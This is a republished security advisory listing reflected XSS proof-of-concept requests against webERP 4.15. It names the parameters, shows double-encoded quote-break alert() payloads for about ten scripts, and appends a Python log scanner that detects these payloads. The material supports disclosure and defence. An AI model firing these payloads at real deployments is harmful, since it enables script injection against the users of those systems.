webERP 4.15 - nsextt Multiple XSS Injection

2019.04.15
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

===========================================================================================
# Exploit Title: webERP 4.15 - nsextt XSS Injection
# CVE: N/A
# Date: 28/02/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://www.weberp.org/
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: webERP is a free open-source ERP system, providing best practice, multi-user business administration and accounting tools over the web.
===========================================================================================

# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004B53)%252b%2522
# GET Request : http://localhost/webERP/webERP/AgedDebtors.php?nsextt=%22%2balert(0x004B53)%2b%22
===========================================================================================

# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x00490C)%252b%2522
# GET Request : http://localhost/webERP/webERP/CustomerAllocations.php?nsextt=%22%2balert(0x00490C)%2b%22
===========================================================================================

# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004F06)%252b%2522
# GET Request : http://localhost/webERP/webERP/CustomerBalancesMovement.php?nsextt=%22%2balert(0x004F06)%2b%22
===========================================================================================

# POC - XSS
# Parameters : NewReceipt,nsextt,Type,nsparamname
# Attack Pattern : %27%2balert(0x0047E5)%2b%27
# GET Request : http://localhost/webERP/webERP/CustomerReceipt.php?NewReceipt='+alert(0x0047E5)+'&Type=Customer
===========================================================================================

# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x0049AA)%252b%2522
# GET Request : http://localhost/webERP/webERP/CustWhereAlloc.php?nsextt=%22%2balert(0x0049AA)%2b%22
===========================================================================================

# POC - XSS
# Parameters : FormID,AddToMenu,ScriptName,Title
# Attack Pattern : %27%2balert(0x003279)%2b%27
# POST Request : http://localhost/webERP/webERP/Dashboard.php
===========================================================================================

# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004C8E)%252b%2522
# GET Request : http://localhost/webERP/webERP/DebtorsAtPeriodEnd.php?nsextt=%22%2balert(0x004C8E)%2b%22
===========================================================================================

# POC - XSS
# Parameters : nsextt
# Attack Pattern : %2522%252balert(0x004BF0)%252b%2522
# GET Request : http://localhost/webERP/webERP/PDFBankingSummary.php?nsextt=%22%2balert(0x004BF0)%2b%22
===========================================================================================

# POC - XSS
# Parameters : nsextt,NewCredit,nsparamname
# Attack Pattern : %27%2balert(0x003279)%2b%27
# GET Request : http://localhost/webERP/webERP/SelectCreditItems.php?NewCredit=Yes&nsextt=%22%2balert(0x0046E2)%2b%22
===========================================================================================

# POC - XSS
# Parameters : nsextt,StockCat,FormID,Keywords,SupplierStockCode,ScriptName,StockCode,AddToMenu,Search,Title
# Attack Pattern : %27%2balert(0x0035E4)%2b%27
# GET Request : http://localhost/webERP/webERP/SelectProduct.php
===========================================================================================
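Every request in the advisory has the same shape: a quote character that closes the attribute or string the value is reflected into, followed by a JavaScript expression, and in most cases the payload is percent-encoded twice (%2522 becomes %22 after the first decode and a literal " after the second). A defender triaging web-server logs for this advisory therefore needs to decode repeatedly before matching. The following Python script is an added example, not part of the author's advisory or of the webERP project; the log lines are constructed, and the function names (inspect_log_line, fully_decode, scan) are hypothetical. It maps each script and parameter named above, decodes query values until they stop changing, and flags values that show the quote-then-expression pattern.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Scripts and parameters taken from the advisory above (webERP 4.15).
AFFECTED = {
    "AgedDebtors.php": {"nsextt"},
    "CustomerAllocations.php": {"nsextt"},
    "CustomerBalancesMovement.php": {"nsextt"},
    "CustomerReceipt.php": {"NewReceipt", "nsextt", "Type", "nsparamname"},
    "CustWhereAlloc.php": {"nsextt"},
    "Dashboard.php": {"FormID", "AddToMenu", "ScriptName", "Title"},
    "DebtorsAtPeriodEnd.php": {"nsextt"},
    "PDFBankingSummary.php": {"nsextt"},
    "SelectCreditItems.php": {"nsextt", "NewCredit", "nsparamname"},
    "SelectProduct.php": {"nsextt", "StockCat", "FormID", "Keywords", "SupplierStockCode",
                          "ScriptName", "StockCode", "AddToMenu", "Search", "Title"},
}

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# The advisory's payloads, once decoded, look like "+alert(...)+" or '+alert(...)+':
# a quote that breaks out of the reflected context, then a JS call.
# parse_qsl turns a literal '+' into a space, so the plus is optional here.
SUSPICIOUS_RE = re.compile(r"""["']\s*\+?\s*alert\s*\(""", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (handles %2522 -> %22 -> ")."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_log_line(line):
    """Return (script, parameter, decoded value) findings for one log line, or []."""
    m = LOG_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    script = parts.path.rsplit("/", 1)[-1]
    watched = AFFECTED.get(script)
    if not watched:
        return []
    findings = []
    # parse_qsl already decodes one layer; fully_decode removes any further layers.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched:
            decoded = fully_decode(value)
            if SUSPICIOUS_RE.search(decoded):
                findings.append((script, name, decoded))
    return findings


def scan(lines):
    """Run inspect_log_line over an iterable of log lines and collect all findings."""
    return [finding for line in lines for finding in inspect_log_line(line)]


# Constructed sample log lines (not real traffic) covering the cases that matter.
SAMPLE_LOG = [
    # the advisory's AgedDebtors.php request as a web server would log it
    '10.0.0.5 - - [15/Apr/2019:10:01:02 +0100] "GET /webERP/webERP/AgedDebtors.php?nsextt=%22%2balert(0x004B53)%2b%22 HTTP/1.1" 200 5120',
    # the double-encoded "Attack Pattern" form from the advisory
    '10.0.0.5 - - [15/Apr/2019:10:01:03 +0100] "GET /webERP/webERP/CustWhereAlloc.php?nsextt=%2522%252balert(0x0049AA)%252b%2522 HTTP/1.1" 200 4800',
    # a benign value in the same parameter
    '10.0.0.7 - - [15/Apr/2019:10:02:10 +0100] "GET /webERP/webERP/AgedDebtors.php?nsextt=Apr19 HTTP/1.1" 200 5120',
    # same payload shape on a script the advisory does not list: deliberately ignored
    '10.0.0.7 - - [15/Apr/2019:10:02:11 +0100] "GET /webERP/webERP/index.php?q=%22%2balert(1)%2b%22 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for script, param, value in scan(SAMPLE_LOG):
        print(f"suspicious value for {param} on {script}: {value!r}")
```

Two caveats a practitioner should keep in mind. First, the access log request line only carries the query string, so the POST case in the advisory (Dashboard.php) and any reflected form fields are invisible to this check; catching those needs request-body logging at a reverse proxy or WAF. Second, matching on alert( is only a signature for the advisory's own proof-of-concept payloads; the durable fix is server-side, by HTML-encoding every reflected value (nsextt and the other listed parameters) before it is written into the page.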


Copyright 2019, cxsecurity.com